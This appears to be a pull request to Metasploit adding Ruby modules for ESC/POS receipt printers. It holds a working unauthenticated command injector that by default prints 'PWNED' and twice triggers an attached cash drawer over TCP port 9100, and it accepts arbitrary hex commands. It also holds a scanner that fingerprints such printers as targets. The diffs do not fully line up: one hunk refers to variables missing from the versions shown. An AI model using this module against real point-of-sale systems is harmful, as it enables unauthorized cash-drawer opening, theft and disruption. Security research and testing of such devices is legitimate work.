### PR TITLE
Escpos scanner module

### DIFF
--- a/modules/auxiliary/admin/printer/escpos_tcp_command_injector.rb
+++ b/modules/auxiliary/admin/printer/escpos_tcp_command_injector.rb
@@ -8,9 +8,9 @@ class MetasploitModule < Msf::Auxiliary
     super(update_info(info,
       'Name'        => 'ESC/POS Printer Command Injector',
       'Description' => %q{
-        This module sends arbitrary ESC/POS commands to a network printer over TCP.
+        This module demonstrates an unauthenticated ESC/POS command vulnerability in networked Epson-compatible printers (CVE submitted). 
         By default, it prints "PWNED" and triggers the attached cash drawer twice.
-        You can override the print message or provide custom hex commands.
+        You can override the print message, provide custom hex commands, or choose to skip sending commands for safe testing.
       },
       'Author'      => ['FutileSkills'],
       'License'     => MSF_LICENSE
@@ -18,10 +18,11 @@ class MetasploitModule < Msf::Auxiliary
 
     register_options(
       [
-        Opt::RHOST(),                # Target IP
-        Opt::RPORT(9100),            # Default printer port
+        Opt::RHOST(),                                      # Target IP
+        Opt::RPORT(9100),                                  # Default printer port
         OptString.new('MESSAGE', [true, 'Message to print', 'PWNED']),
-        OptString.new('HEX_COMMANDS', [false, 'Custom hex commands to send before printing'])
+        OptString.new('HEX_COMMANDS', [false, 'Custom hex commands to send before printing']),
+        OptBool.new('RUN_EXPLOIT', [true, 'Whether to actually send commands to the printer', true])
       ]
     )
   end
@@ -30,44 +31,49 @@ class MetasploitModule < Msf::Auxiliary
   DRAWER_COMMAND = "\x1b\x70\x00\x19\x32"
 
   def run
+    rhost_ip = rhost
     message = datastore['MESSAGE']
     hex_commands = datastore['HEX_COMMANDS']
+    run_exploit = datastore['RUN_EXPLOIT']
 
-    # If custom hex commands are provided, convert them from escaped string to actual bytes
-    if hex_commands && !hex_commands.empty?
+    if run_exploit
+      # Send custom hex commands before default sequence
+      if hex_commands && !hex_commands.empty?
+        begin
+          custom_bytes = [hex_commands.gsub(/\\x([0-9A-Fa-f]{2})/, '\1')].pack('H*')
+          connect
+          sock.put(custom_bytes)
+          disconnect
+          print_status("Sent custom HEX_COMMANDS to #{rhost_ip}")
+        rescue => e
+          print_error("Failed to send HEX_COMMANDS: #{e}")
+        end
+      end
+
+      # ESC/POS print commands: initialize, center, double-size font for message, reset alignment, cut
+      print_commands = "\x1b\x40\x1b\x61\x01\x1d\x21\x11#{message}\x1d\x21\x00\n\x1b\x61\x00\n\n\x1d\x56\x42"
+
       begin
-        # Replace \xNN sequences with actual bytes
-        custom_bytes = [hex_commands.gsub(/\\x([0-9A-Fa-f]{2})/, '\1')].pack('H*')
+        print_status("Sending print message to #{rhost_ip}...")
         connect
-        sock.put(custom_bytes)
+        sock.put(print_commands)
         disconnect
-        print_status("Sent custom hex commands to #{rhost}")
-      rescue => e
-        print_error("Failed to send HEX_COMMANDS: #{e}")
+
+        sleep(1)
+
+        2.times do
+          connect
+          sock.put(DRAWER_COMMAND)
+          disconnect
+          sleep(0.5)
+        end
+
+        print_good("Finished sending commands to #{rhost_ip}")
+      rescue ::Rex::ConnectionError
+        print_error("Failed to connect to #{rhost_ip}")
       end
-    end
-
-    # ESC/POS print commands: initialize, center, double-size font for message, reset alignment, cut
-    print_commands = "\x1b\x40\x1b\x61\x01\x1d\x21\x11#{message}\x1d\x21\x00\n\x1b\x61\x00\n\n\x1d\x56\x42"
-
-    begin
-      print_status("Sending print message to #{rhost}...")
-      connect
-      sock.put(print_commands)
-      disconnect
-
-      sleep(1)
-
-      2.times do
-        connect
-        sock.put(DRAWER_COMMAND)
-        disconnect
-        sleep(0.5)
-      end
-
-      print_good("Finished sending commands to #{rhost}")
-    rescue ::Rex::ConnectionError
-      print_error("Failed to connect to #{rhost}")
+    else
+      print_status("RUN_EXPLOIT is false; skipping sending commands to #{rhost_ip}")
     end
   end
 end

--- a/modules/auxiliary/admin/printer/escpos_tcp_command_injector.rb
+++ b/modules/auxiliary/admin/printer/escpos_tcp_command_injector.rb
@@ -1,0 +1,73 @@
+# encoding: utf-8
+require 'msf/core'
+
+class MetasploitModule < Msf::Auxiliary
+  include Msf::Exploit::Remote::Tcp
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'        => 'ESC/POS Printer Command Injector',
+      'Description' => %q{
+        This module sends arbitrary ESC/POS commands to a network printer over TCP.
+        By default, it prints "PWNED" and triggers the attached cash drawer twice.
+        You can override the print message or provide custom hex commands.
+      },
+      'Author'      => ['FutileSkills'],
+      'License'     => MSF_LICENSE
+    ))
+
+    register_options(
+      [
+        Opt::RHOST(),                # Target IP
+        Opt::RPORT(9100),            # Default printer port
+        OptString.new('MESSAGE', [true, 'Message to print', 'PWNED']),
+        OptString.new('HEX_COMMANDS', [false, 'Custom hex commands to send before printing'])
+      ]
+    )
+  end
+
+  # Cash drawer command
+  DRAWER_COMMAND = "\x1b\x70\x00\x19\x32"
+
+  def run
+    message = datastore['MESSAGE']
+    hex_commands = datastore['HEX_COMMANDS']
+
+    # If custom hex commands are provided, convert them from escaped string to actual bytes
+    if hex_commands && !hex_commands.empty?
+      begin
+        # Replace \xNN sequences with actual bytes
+        custom_bytes = [hex_commands.gsub(/\\x([0-9A-Fa-f]{2})/, '\1')].pack('H*')
+        connect
+        sock.put(custom_bytes)
+        disconnect
+        print_status("Sent custom hex commands to #{rhost}")
+      rescue => e
+        print_error("Failed to send HEX_COMMANDS: #{e}")
+      end
+    end
+
+    # ESC/POS print commands: initialize, center, double-size font for message, reset alignment, cut
+    print_commands = "\x1b\x40\x1b\x61\x01\x1d\x21\x11#{message}\x1d\x21\x00\n\x1b\x61\x00\n\n\x1d\x56\x42"
+
+    begin
+      print_status("Sending print message to #{rhost}...")
+      connect
+      sock.put(print_commands)
+      disconnect
+
+      sleep(1)
+
+      2.times do
+        connect
+        sock.put(DRAWER_COMMAND)
+        disconnect
+        sleep(0.5)
+      end
+
+      print_good("Finished sending commands to #{rhost}")
+    rescue ::Rex::ConnectionError
+      print_error("Failed to connect to #{rhost}")
+    end
+  end
+end

--- a/modules/auxiliary/admin/printer/escpos_tcp_command_injector.rb
+++ b/modules/auxiliary/admin/printer/escpos_tcp_command_injector.rb
@@ -61,12 +61,14 @@ class MetasploitModule < Msf::Auxiliary
         sock.put(print_commands)
         disconnect
 
-        # Optionally trigger the drawer
+        # Optionally trigger the drawer (send twice with short delay)
         if trigger_drawer
-          sleep(1)
-          connect
-          sock.put(DRAWER_COMMAND)
-          disconnect
+          2.times do
+            connect
+            sock.put(DRAWER_COMMAND)
+            disconnect
+            sleep(0.5)
+          end
           print_status("Triggered cash drawer on #{rhost_ip}")
         end
 

--- a/modules/auxiliary/scanner/printer/escpos_discovery.rb
+++ b/modules/auxiliary/scanner/printer/escpos_discovery.rb
@@ -1,0 +1,167 @@
+# encoding: utf-8
+require 'msf/core'
+
+class MetasploitModule < Msf::Auxiliary
+  include Msf::Auxiliary::Scanner
+  include Msf::Exploit::Remote::Tcp
+  include Msf::Auxiliary::Report
+
+  # Optional SNMP client mixin (available in MSF)
+  begin
+    include Msf::Exploit::Remote::SNMPClient
+    HAVE_SNMP = true
+  rescue ::LoadError, ::NameError
+    HAVE_SNMP = false
+  end
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'        => 'ESC/POS Network Printer Discovery',
+      'Description' => %q{
+        Identifies network printers that are likely ESC/POS-compatible (e.g., Epson TM series,
+        Star Micronics, BIXOLON) and therefore candidates for raw TCP/9100 command injection.
+        The module checks for an open raw printing port (9100), can optionally send a *safe*
+        ESC/POS status query (DLE EOT 1), and can optionally query SNMP for sysDescr and MAC OUIs.
+        Results are recorded to the database via services and notes.
+      },
+      'Author'      => ['FutileSkills'],
+      'License'     => MSF_LICENSE
+    ))
+
+    register_options(
+      [
+        Opt::RHOSTS,
+        Opt::RPORT(9100),
+        OptInt.new('TIMEOUT', [true, 'TCP read timeout (ms)', 1000]),
+        OptBool.new('ACTIVE_CHECK', [true, 'Send safe ESC/POS status (DLE EOT 1) after connect', true]),
+        OptBool.new('USE_SNMP', [true, 'Attempt SNMP sysDescr/MAC fingerprinting', true]),
+        OptString.new('SNMP_COMMUNITY', [true, 'SNMP v2c community (if USE_SNMP)', 'public']),
+        OptInt.new('SNMP_TIMEOUT', [true, 'SNMP timeout (ms)', 1000]),
+        OptInt.new('SNMP_RETRIES', [true, 'SNMP retries', 1]),
+      ]
+    )
+
+    register_advanced_options(
+      [
+        OptString.new('VENDOR_REGEX', [true,
+          'Regex (case-insensitive) for vendor match in sysDescr/MAC OUI',
+          '(epson|escpos|tm-\w+|star\s*micronics|bixolon|pos[-\s]*x|citizen|sewoo)']),
+        OptString.new('OUI_HINTS', [true,
+          'Comma-separated OUI prefixes (hex, no separators) to hint printer vendors',
+          '0080C7,00:80:C7,00D0:12,001BA9,0030F9,3C:2A:F4'])
+      ]
+    )
+  end
+
+  # Safe ESC/POS device status query (DLE EOT n). Many printers ignore; any response is a hint.
+  DLE_EOT1 = "\x10\x04\x01".b
+
+  def setup
+    @vendor_rx = Regexp.new(datastore['VENDOR_REGEX'], Regexp::IGNORECASE)
+    @oui_hints = datastore['OUI_HINTS'].to_s.split(/[,\s]+/).map { |s| s.delete(':-').upcase }.reject(&:empty?)
+    super
+  end
+
+  def run_host(ip)
+    found = {
+      rport_open: false,
+      escpos_resp: nil,
+      snmp_sysdescr: nil,
+      snmp_macs: [],
+      vendor_match: []
+    }
+
+    # 1) Check TCP/9100
+    vprint_status("#{ip}:#{rport} checking TCP")
+    begin
+      connect(true, { 'RHOST' => ip })
+      found[:rport_open] = true
+      store_service(host: ip, port: rport, proto: 'tcp', name: 'printer-raw-9100')
+      if datastore['ACTIVE_CHECK']
+        sock.put(DLE_EOT1)
+        sock.flush
+        resp = sock.get_once(datastore['TIMEOUT'].to_i / 1000.0)
+        found[:escpos_resp] = resp && resp.bytes.map { |b| sprintf('0x%02X', b) }.join(' ')
+      end
+    rescue ::Rex::ConnectionError
+      found[:rport_open] = false
+    ensure
+      disconnect rescue nil
+    end
+
+    # 2) Optional SNMP fingerprinting
+    if datastore['USE_SNMP']
+      if !HAVE_SNMP
+        vprint_error("#{ip}: SNMP mixin not available in this environment")
+      else
+        begin
+          snmp = connect_snmp(host: ip,
+                              community: datastore['SNMP_COMMUNITY'],
+                              version: :SNMPv2c,
+                              timeout: datastore['SNMP_TIMEOUT'].to_i,
+                              retries: datastore['SNMP_RETRIES'].to_i)
+          if snmp
+            # sysDescr.0
+            sys_descr = snmp.get_value('1.3.6.1.2.1.1.1.0') rescue nil
+            found[:snmp_sysdescr] = sys_descr if sys_descr && !sys_descr.empty?
+            # ifPhysAddress walk
+            macs = []
+            begin
+              snmp.walk('1.3.6.1.2.1.2.2.1.6') do |vb|
+                mac = vb.value.is_a?(String) ? vb.value.unpack('C*').map { |b| sprintf('%02X', b) }.join(':') : nil
+                macs << mac if mac && mac !~ /^00(:00){5}$/i
+              end
+            rescue ::StandardError
+            end
+            found[:snmp_macs] = macs.uniq
+            snmp.close
+          end
+        rescue ::StandardError => e
+          vprint_error("#{ip}: SNMP error: #{e.class}: #{e.message}")
+        end
+      end
+    end
+
+    # 3) Heuristics / vendor hints
+    if found[:snmp_sysdescr].to_s =~ @vendor_rx
+      found[:vendor_match] << 'sysDescr'
+    end
+    unless found[:snmp_macs].empty? || @oui_hints.empty?
+      found[:snmp_macs].each do |m|
+        compact = m.delete(':').upcase
+        # Compare first 6 hex chars (OUI)
+        if @oui_hints.any? { |h| compact.start_with?(h.delete(':')) }
+          found[:vendor_match] << "OUI(#{m})"
+        end
+      end
+    end
+
+    # 4) Decision & reporting
+    likely = found[:rport_open] && (found[:escpos_resp] || !found[:vendor_match].empty?)
+
+    if likely
+      print_good("#{ip}: Likely ESC/POS printer (tcp/9100 open; hints=#{(found[:vendor_match].empty? ? 'none' : found[:vendor_match].join(', '))}; escpos_resp=#{found[:escpos_resp] || 'none'})")
+    elsif found[:rport_open]
+      print_status("#{ip}: tcp/9100 open, but no ESC/POS hints found (may still be raw-print capable).")
+    else
+      vprint_status("#{ip}: tcp/9100 closed")
+    end
+
+    # Persist useful details
+    note_data = {
+      module: fullname,
+      escpos_candidate: likely,
+      tcp_9100_open: found[:rport_open],
+      escpos_status_bytes: found[:escpos_resp],
+      snmp_sysdescr: found[:snmp_sysdescr],
+      snmp_macs: found[:snmp_macs],
+      vendor_indicators: found[:vendor_match]
+    }
+    report_note(
+      host: ip,
+      type: 'printer.escpos.discovery',
+      data: note_data,
+      update: true
+    )
+  end
+end


### PR DESCRIPTION
## Summary

Adds an auxiliary scanner for discovering network printers likely to be ESC/POS-compatible (Epson TM series, Star Micronics, BIXOLON, etc.). The module checks for TCP/9100, optionally queries SNMP for sysDescr and MAC OUIs, and flags devices as likely ESC/POS candidates. 

No printing or drawer commands are sent. Results are recorded in the Metasploit database as services and notes. This helps identify targets before using the ESC/POS exploit module.

Author: FutileSkills
CVE: Pending

## Verification

- [ ] Start `msfconsole`
- [ ] `use auxiliary/scanner/printer/escpos_discovery`
- [ ] Set `RHOSTS` to a test subnet
- [ ] Optionally configure `USE_SNMP`, `THREADS`, etc.
- [ ] Run the module
- [ ] Confirm likely ESC/POS printers are identified correctly
- [ ] Verify no destructive commands are sent

## Notes

- Safe for lab testing only
- Can assist in CVE validation and vulnerability demonstration
- Demonstration of successful module execution can be provided as a PCAP or screen recording if needed
